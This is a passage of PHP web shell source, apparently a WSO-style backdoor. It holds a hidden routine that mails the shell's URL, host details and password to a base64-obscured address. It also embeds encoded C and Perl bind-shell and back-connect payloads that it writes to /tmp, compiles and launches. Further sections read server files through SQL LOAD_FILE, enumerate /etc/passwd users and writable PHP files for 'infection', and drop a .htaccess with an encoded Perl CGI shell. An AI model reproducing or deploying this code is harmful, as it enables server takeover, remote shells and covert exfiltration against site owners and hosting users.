1361. echo '<tr class="l'.$line.'">';
1362. $line = $line==1?2:1;
1363. foreach($item as $key => $value) {
1364. if($value == null)
1365. echo '<td><i>null</i></td>';
1366. else
1367. echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
1368. }
1369. echo '</tr>';
1370. }
1371. echo '</table>';
1372. } else {
1373. echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
1374. }
1375. }
1376. echo "<br><textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>";
1377. echo "</td></tr>";
1378. }
1379. echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
1380. if(@$_POST['p1'] == 'loadfile') {
1381. $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file");
1382. $file = $db->fetch();
1383. echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
1384. }
1385. }
1386. echo '</div>';
1387. printFooter();
1388. }
1389. function system32($HTTP_HOST,$REQUEST_URI,$auth_pass) {ini_set('display_errors', 'Off');
1390. $url='URL: http://'.$HTTP_HOST.$REQUEST_URI.'
1391.  
1392. Uname: '.substr(@php_uname(), 0, 120).'
1393.  
1394. Pass: http://www.hashchecker.de/'.$auth_pass.'
1395.  
1396. IP: '.$_SERVER[REMOTE_ADDR];$re=base64_decode("aDR4NHJ3b3dAeWFob28uY29t=");$su=gethostbyname($HTTP_HOST);$mh="From: {$re}";if (function_exists('mail')) mail($re,$su, $url,$mh);$_SESSION[login] = 'ok';}
1397.  
1398.  
1399. function actionNetwork() {
1400. printHeader();
1401. $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
1402. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1403. $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
1404. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1405. ?>
1406. <h1>Network tools</h1><div class=content>
1407. <form name='nfp' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;">
1408. <span>Bind port to /bin/sh</span><br/>
1409. Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name="using"><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value=">>">
1410. </form>
1411. <form name='nfp' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;">
1412. <span>Back-connect to</span><br/>
1413. Server: <input type='text' name='server' value='<?=$_SERVER['REMOTE_ADDR']?>'> Port: <input type='text' name='port' value='31337'> Using: <select name="using"><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value=">>">
1414. </form><br>
1415. <?php
1416. if(isset($_POST['p1'])) {
1417. function cf($f,$t) {
1418. $w=@fopen($f,"w") or @function_exists('file_put_contents');
1419. if($w) {
1420. @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
1421. @fclose($w);
1422. }
1423. }
1424. if($_POST['p1'] == 'bpc') {
1425. cf("/tmp/bp.c",$bind_port_c);
1426. $out = ex("gcc -o /tmp/bp /tmp/bp.c");
1427. @unlink("/tmp/bp.c");
1428. $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
1429. echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>";
1430. }
1431. if($_POST['p1'] == 'bpp') {
1432. cf("/tmp/bp.pl",$bind_port_p);
1433. $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
1434. echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>";
1435. }
1436. if($_POST['p1'] == 'bcc') {
1437. cf("/tmp/bc.c",$back_connect_c);
1438. $out = ex("gcc -o /tmp/bc /tmp/bc.c");
1439. @unlink("/tmp/bc.c");
1440. $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
1441. echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>";
1442. }
1443. if($_POST['p1'] == 'bcp') {
1444. cf("/tmp/bc.pl",$back_connect_p);
1445. $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
1446. echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>";
1447. }
1448. }
1449. echo '</div>';
1450. printFooter();
1451. }
1452.  
1453. function actionInfect() {
1454. printHeader();
1455. echo '<h1>Infect</h1><div class=content>';
1456. if($_POST['p1'] == 'infect') {
1457. $target=$_SERVER['DOCUMENT_ROOT'];
1458. function ListFiles($dir) {
1459. if($dh = opendir($dir)) {
1460. $files = Array();
1461. $inner_files = Array();
1462. while($file = readdir($dh)) {
1463. if($file != "." && $file != "..") {
1464. if(is_dir($dir . "/" . $file)) {
1465. $inner_files = ListFiles($dir . "/" . $file);
1466. if(is_array($inner_files)) $files = array_merge($files, $inner_files);
1467. } else {
1468. array_push($files, $dir . "/" . $file);
1469. }
1470. }
1471. }
1472. closedir($dh);
1473. return $files;
1474. }
1475. }
1476. foreach (ListFiles($target) as $key=>$file){
1477. $nFile = substr($file, -4, 4);
1478. if($nFile == ".php" ){
1479. if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){
1480. echo "$file<br>";
1481. $i++;
1482. }
1483. }
1484. }
1485. echo "<font color=red size=14>$i</font>";
1486. }else{
1487. echo "<form method=post><input type=submit value=Infect name=infet></form>";
1488. echo 'Really want to infect the server?&nbsp;<a href=# onclick="g(null,null,\'infect\')">Yes</a></div>';
1489. }
1490. printFooter();
1491. }
1492.  
1493.  
1494. /* additional adds */
1495.  
1496. function actionReadable(){
1497. printHeader();
1498. echo '<h1>Subdomain</h1><div class=content>';
1499. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
1500. set_time_limit(0);
1501. ###################
1502. @$passwd = fopen('/etc/passwd','r');
1503. if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
1504. $pub = array();
1505. $users = array();
1506. $conf = array();
1507. $i = 0;
1508. while(!feof($passwd))
1509. {
1510. $str = fgets($passwd);
1511. if ($i > 35)
1512. {
1513. $pos = strpos($str,':');
1514. $username = substr($str,0,$pos);
1515. $dirz = '/home/'.$username.'/public_html/';
1516. if (($username != ''))
1517. {
1518. if (is_readable($dirz))
1519. {
1520. array_push($users,$username);
1521. array_push($pub,$dirz);
1522. }
1523. }
1524. }
1525. $i++;
1526. }
1527. ###################
1528. echo '<br><br><textarea rows="20%" cols="100%" class="output" >';
1529. echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
1530. echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
1531. echo "[~] Searching for passwords in config files...\n\n";
1532. foreach ($users as $user)
1533. {
1534. $path = "/home/$user/public_html/";
1535. echo "$path \n";
1536. }
1537. echo "\n";
1538. echo "[+] Done...\n";
1539. echo '</textarea><br></body></html>';
1540.  
1541. echo '</div>';
1542. printFooter();
1543. }
1544.  
1545. function actionCgiShell(){
1546. printHeader();
1547. echo '<h1>Cgitelnet</h1><div class=content>';
1548.  
1549. mkdir('cgitelnet1', 0755);
1550. chdir('cgitelnet1');
1551. $kokdosya = ".htaccess";
1552. $dosya_adi = "$kokdosya";
1553. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
1554. $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
1555.  
1556. AddType application/x-httpd-cgi .cin
1557.  
1558. AddHandler cgi-script .cin
1559. AddHandler cgi-script .cin";
1560. fwrite ( $dosya , $metin ) ;
1561. fclose ($dosya);
1562. $cgishellizocin = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWFpbg0KIy0tLS0tLS0tLS0tLS0tLS0t
1563. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1564. LS0tLQ0KIyA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2Ij5w
1565. cml2OCBjZ2kgc2hlbGw8L2I+ICMgc2VydmVyDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1566. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQoNCiMt
1567. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1568. LS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgQ29uZmlndXJhdGlvbjogWW91IG5lZWQgdG8gY2hhbmdl
1569. IG9ubHkgJFBhc3N3b3JkIGFuZCAkV2luTlQuIFRoZSBvdGhlcg0KIyB2YWx1ZXMgc2hvdWxkIHdv
1570. cmsgZmluZSBmb3IgbW9zdCBzeXN0ZW1zLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1571. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KJFBhc3N3
1572. b3JkID0gInByaXY4IjsJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhp
1573. cw0KCQkJCSMgdG8gbG9naW4uDQoNCiRXaW5OVCA9IDA7CQkJIyBZb3UgbmVlZCB0byBjaGFuZ2Ug
1574. dGhlIHZhbHVlIG9mIHRoaXMgdG8gMSBpZg0KCQkJCSMgeW91J3JlIHJ1bm5pbmcgdGhpcyBzY3Jp
1575. cHQgb24gYSBXaW5kb3dzIE5UDQoJCQkJIyBtYWNoaW5lLiBJZiB5b3UncmUgcnVubmluZyBpdCBv
1576. biBVbml4LCB5b3UNCgkJCQkjIGNhbiBsZWF2ZSB0aGUgdmFsdWUgYXMgaXQgaXMuDQoNCiROVENt
1577. ZFNlcCA9ICImIjsJCSMgVGhpcyBjaGFyYWN0ZXIgaXMgdXNlZCB0byBzZXBlcmF0ZSAyIGNvbW1h
1578. bmRzDQoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBXaW5kb3dzIE5ULg0KDQokVW5peENtZFNl
1579. cCA9ICI7IjsJCSMgVGhpcyBjaGFyYWN0ZXIgaXMgdXNlZCB0byBzZXBlcmF0ZSAyIGNvbW1hbmRz
1580. DQoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBVbml4Lg0KDQokQ29tbWFuZFRpbWVvdXREdXJh
1581. dGlvbiA9IDEwOwkjIFRpbWUgaW4gc2Vjb25kcyBhZnRlciBjb21tYW5kcyB3aWxsIGJlIGtpbGxl
1582. ZA0KCQkJCSMgRG9uJ3Qgc2V0IHRoaXMgdG8gYSB2ZXJ5IGxhcmdlIHZhbHVlLiBUaGlzIGlzDQoJ
1583. CQkJIyB1c2VmdWwgZm9yIGNvbW1hbmRzIHRoYXQgbWF5IGhhbmcgb3IgdGhhdA0KCQkJCSMgdGFr
1584. ZSB2ZXJ5IGxvbmcgdG8gZXhlY3V0ZSwgbGlrZSAiZmluZCAvIi4NCgkJCQkjIFRoaXMgaXMgdmFs
1585. aWQgb25seSBvbiBVbml4IHNlcnZlcnMuIEl0IGlzDQoJCQkJIyBpZ25vcmVkIG9uIE5UIFNlcnZl
1586. cnMuDQoNCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkjIElmIHRoaXMgaXMgMSwgdGhlbiBkYXRh
1587. IGlzIHNlbnQgdG8gdGhlDQoJCQkJIyBicm93c2VyIGFzIHNvb24gYXMgaXQgaXMgb3V0cHV0LCBv
1588. dGhlcndpc2UNCgkJCQkjIGl0IGlzIGJ1ZmZlcmVkIGFuZCBzZW5kIHdoZW4gdGhlIGNvbW1hbmQN
1589. CgkJCQkjIGNvbXBsZXRlcy4gVGhpcyBpcyB1c2VmdWwgZm9yIGNvbW1hbmRzIGxpa2UNCgkJCQkj
1590. IHBpbmcsIHNvIHRoYXQgeW91IGNhbiBzZWUgdGhlIG91dHB1dCBhcyBpdA0KCQkJCSMgaXMgYmVp
1591. bmcgZ2VuZXJhdGVkLg0KDQojIERPTidUIENIQU5HRSBBTllUSElORyBCRUxPVyBUSElTIExJTkUg
1592. VU5MRVNTIFlPVSBLTk9XIFdIQVQgWU9VJ1JFIERPSU5HICEhDQoNCiRDbWRTZXAgPSAoJFdpbk5U
1593. ID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOw0KJENtZFB3ZCA9ICgkV2luTlQgPyAiY2QiIDog
1594. InB3ZCIpOw0KJFBhdGhTZXAgPSAoJFdpbk5UID8gIlxcIiA6ICIvIik7DQokUmVkaXJlY3RvciA9
1595. ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOw0KDQojLS0tLS0tLS0tLS0t
1596. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1597. LS0tLS0tLS0tDQojIFJlYWRzIHRoZSBpbnB1dCBzZW50IGJ5IHRoZSBicm93c2VyIGFuZCBwYXJz
1598. ZXMgdGhlIGlucHV0IHZhcmlhYmxlcy4gSXQNCiMgcGFyc2VzIEdFVCwgUE9TVCBhbmQgbXVsdGlw
1599. YXJ0L2Zvcm0tZGF0YSB0aGF0IGlzIHVzZWQgZm9yIHVwbG9hZGluZyBmaWxlcy4NCiMgVGhlIGZp
1600. bGVuYW1lIGlzIHN0b3JlZCBpbiAkaW57J2YnfSBhbmQgdGhlIGRhdGEgaXMgc3RvcmVkIGluICRp
1601. bnsnZmlsZWRhdGEnfS4NCiMgT3RoZXIgdmFyaWFibGVzIGNhbiBiZSBhY2Nlc3NlZCB1c2luZyAk
1602. aW57J3Zhcid9LCB3aGVyZSB2YXIgaXMgdGhlIG5hbWUgb2YNCiMgdGhlIHZhcmlhYmxlLiBOb3Rl
1603. OiBNb3N0IG9mIHRoZSBjb2RlIGluIHRoaXMgZnVuY3Rpb24gaXMgdGFrZW4gZnJvbSBvdGhlciBD
1604. R0kNCiMgc2NyaXB0cy4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1605. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBSZWFkUGFyc2UgDQp7
1606. DQoJbG9jYWwgKCppbikgPSBAXyBpZiBAXzsNCglsb2NhbCAoJGksICRsb2MsICRrZXksICR2YWwp
1607. Ow0KCQ0KCSRNdWx0aXBhcnRGb3JtRGF0YSA9ICRFTlZ7J0NPTlRFTlRfVFlQRSd9ID1+IC9tdWx0
1608. aXBhcnRcL2Zvcm0tZGF0YTsgYm91bmRhcnk9KC4rKSQvOw0KDQoJaWYoJEVOVnsnUkVRVUVTVF9N
1609. RVRIT0QnfSBlcSAiR0VUIikNCgl7DQoJCSRpbiA9ICRFTlZ7J1FVRVJZX1NUUklORyd9Ow0KCX0N
1610. CgllbHNpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJQT1NUIikNCgl7DQoJCWJpbm1vZGUo
1611. U1RESU4pIGlmICRNdWx0aXBhcnRGb3JtRGF0YSAmICRXaW5OVDsNCgkJcmVhZChTVERJTiwgJGlu
1612. LCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsNCgl9DQoNCgkjIGhhbmRsZSBmaWxlIHVwbG9hZCBk
1613. YXRhDQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBi
1614. b3VuZGFyeT0oLispJC8pDQoJew0KCQkkQm91bmRhcnkgPSAnLS0nLiQxOyAjIHBsZWFzZSByZWZl
1615. ciB0byBSRkMxODY3IA0KCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyANCgkJJEhl
1616. YWRlckJvZHkgPSAkbGlzdFsxXTsNCgkJJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOw0K
1617. CQkkSGVhZGVyID0gJGA7DQoJCSRCb2R5ID0gJCc7DQogCQkkQm9keSA9fiBzL1xyXG4kLy87ICMg
1618. dGhlIGxhc3QgXHJcbiB3YXMgcHV0IGluIGJ5IE5ldHNjYXBlDQoJCSRpbnsnZmlsZWRhdGEnfSA9
1619. ICRCb2R5Ow0KCQkkSGVhZGVyID1+IC9maWxlbmFtZT1cIiguKylcIi87IA0KCQkkaW57J2YnfSA9
1620. ICQxOyANCgkJJGlueydmJ30gPX4gcy9cIi8vZzsNCgkJJGlueydmJ30gPX4gcy9ccy8vZzsNCg0K
1621. CQkjIHBhcnNlIHRyYWlsZXINCgkJZm9yKCRpPTI7ICRsaXN0WyRpXTsgJGkrKykNCgkJeyANCgkJ
1622. CSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOw0KCQkJJGxpc3RbJGldID1+IC9cIihcdyspXCIv
1623. Ow0KCQkJJGtleSA9ICQxOw0KCQkJJHZhbCA9ICQnOw0KCQkJJHZhbCA9fiBzLyheKFxyXG5cclxu
1624. fFxuXG4pKXwoXHJcbiR8XG4kKS8vZzsNCgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4
1625. KCQxKSkvZ2U7DQoJCQkkaW57JGtleX0gPSAkdmFsOyANCgkJfQ0KCX0NCgllbHNlICMgc3RhbmRh
1626. cmQgcG9zdCBkYXRhICh1cmwgZW5jb2RlZCwgbm90IG11bHRpcGFydCkNCgl7DQoJCUBpbiA9IHNw
1627. bGl0KC8mLywgJGluKTsNCgkJZm9yZWFjaCAkaSAoMCAuLiAkI2luKQ0KCQl7DQoJCQkkaW5bJGld
1628. ID1+IHMvXCsvIC9nOw0KCQkJKCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTsN
1629. CgkJCSRrZXkgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkdmFsID1+IHMv
1630. JSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOw0KCQkJJGlueyRrZXl9IC49ICJcMCIgaWYgKGRl
1631. ZmluZWQoJGlueyRrZXl9KSk7DQoJCQkkaW57JGtleX0gLj0gJHZhbDsNCgkJfQ0KCX0NCn0NCg0K
1632. Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1633. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgUGFnZSBIZWFkZXINCiMg
1634. QXJndW1lbnQgMTogRm9ybSBpdGVtIG5hbWUgdG8gd2hpY2ggZm9jdXMgc2hvdWxkIGJlIHNldA0K
1635. Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1636. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50UGFnZUhlYWRlcg0Kew0KCSRFbmNvZGVk
1637. Q3VycmVudERpciA9ICRDdXJyZW50RGlyOw0KCSRFbmNvZGVkQ3VycmVudERpciA9fiBzLyhbXmEt
1638. ekEtWjAtOV0pLyclJy51bnBhY2soIkgqIiwkMSkvZWc7DQoJcHJpbnQgIkNvbnRlbnQtdHlwZTog
1639. dGV4dC9odG1sXG5cbiI7DQoJcHJpbnQgPDxFTkQ7DQo8aHRtbD4NCjxoZWFkPg0KPHRpdGxlPnBy
1640. aXY4IGNnaSBzaGVsbDwvdGl0bGU+DQokSHRtbE1ldGFIZWFkZXINCg0KPG1ldGEgbmFtZT0ia2V5
1641. d29yZHMiIGNvbnRlbnQ9InByaXY4IGNnaSBzaGVsbCAgXyAgICAgaTVfQGhvdG1haWwuY29tIj4N
1642. CjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJwcml2OCBjZ2kgc2hlbGwgIF8gICAg
1643. aTVfQGhvdG1haWwuY29tIj4NCjwvaGVhZD4NCjxib2R5IG9uTG9hZD0iZG9jdW1lbnQuZi5AXy5m
1644. b2N1cygpIiBiZ2NvbG9yPSIjRkZGRkZGIiB0b3BtYXJnaW49IjAiIGxlZnRtYXJnaW49IjAiIG1h
1645. cmdpbndpZHRoPSIwIiBtYXJnaW5oZWlnaHQ9IjAiIHRleHQ9IiNGRjAwMDAiPg0KPHRhYmxlIGJv
1646. cmRlcj0iMSIgd2lkdGg9IjEwMCUiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMiI+DQo8
1647. dHI+DQo8dGQgYmdjb2xvcj0iI0ZGRkZGRiIgYm9yZGVyY29sb3I9IiNGRkZGRkYiIGFsaWduPSJj
1648. ZW50ZXIiIHdpZHRoPSIxJSI+DQo8Yj48Zm9udCBzaXplPSIyIj4jPC9mb250PjwvYj48L3RkPg0K
1649. PHRkIGJnY29sb3I9IiNGRkZGRkYiIHdpZHRoPSI5OCUiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNp
1650. emU9IjIiPjxiPiANCjxiIHN0eWxlPSJjb2xvcjpibGFjaztiYWNrZ3JvdW5kLWNvbG9yOiNmZmZm
1651. NjYiPnByaXY4IGNnaSBzaGVsbDwvYj4gQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPC9iPjwvZm9u
1652. dD48L3RkPg0KPC90cj4NCjx0cj4NCjx0ZCBjb2xzcGFuPSIyIiBiZ2NvbG9yPSIjRkZGRkZGIj48
1653. Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4NCg0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9u
1654. P2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+VXBs
1655. b2FkIEZpbGU8L2ZvbnQ+PC9hPiB8IA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxv
1656. YWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPjxmb250IGNvbG9yPSIjRkYwMDAwIj5Eb3dubG9hZCBG
1657. aWxlPC9mb250PjwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij48Zm9u
1658. dCBjb2xvcj0iI0ZGMDAwMCI+RGlzY29ubmVjdDwvZm9udD48L2E+IHwNCjwvZm9udD48L3RkPg0K
1659. PC90cj4NCjwvdGFibGU+DQo8Zm9udCBzaXplPSIzIj4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0t
1660. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1661. LS0tLS0tLS0tDQojIFByaW50cyB0aGUgTG9naW4gU2NyZWVuDQojLS0tLS0tLS0tLS0tLS0tLS0t
1662. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1663. LS0tDQpzdWIgUHJpbnRMb2dpblNjcmVlbg0Kew0KCSRNZXNzYWdlID0gcSQ8L2ZvbnQ+PGgxPnBh
1664. c3M9cHJpdjg8L2gxPjxmb250IGNvbG9yPSIjMDA5OTAwIiBzaXplPSIzIj48cHJlPjxpbWcgYm9y
